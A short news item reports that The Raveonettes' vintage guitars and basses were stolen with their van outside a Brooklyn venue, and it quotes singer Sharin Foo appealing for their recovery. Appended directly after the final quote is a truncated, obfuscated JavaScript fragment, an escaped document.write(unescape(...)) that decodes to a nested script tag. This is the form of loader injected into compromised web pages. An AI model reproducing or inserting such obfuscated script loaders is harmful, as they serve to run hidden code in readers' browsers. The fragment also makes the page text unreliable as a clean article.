The Raveonettes have had a series of irreplaceable vintage guitars and equipment stolen from an American gig.
The band's kit was taken when their van was stolen out side the Warsaw venue in Brooklyn, New York, on October 7, meaning the group now have try to buy more vintage equipment for their tour supporting Depeche Mode in America next month.
"So much has been lost, but there were four guitars and basses that are truly the things that matter most to us," explained frontwoman Sharin Foo. "Like (Sune Rose)Wagner's Jazzmaster from 1961 that he has lived and travelled with, played and written on for the past 12 years."
The band managed to play their gig despite the theft, borrowing instruments for an acoustic set, but are now appealing for help to recover their equipment.
"If you see or hear anything about these two guitars and two basses please email us immediately at info@theraveonettes.com," asked Foo. "You will be rewarded beyond your wildest dreams."document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
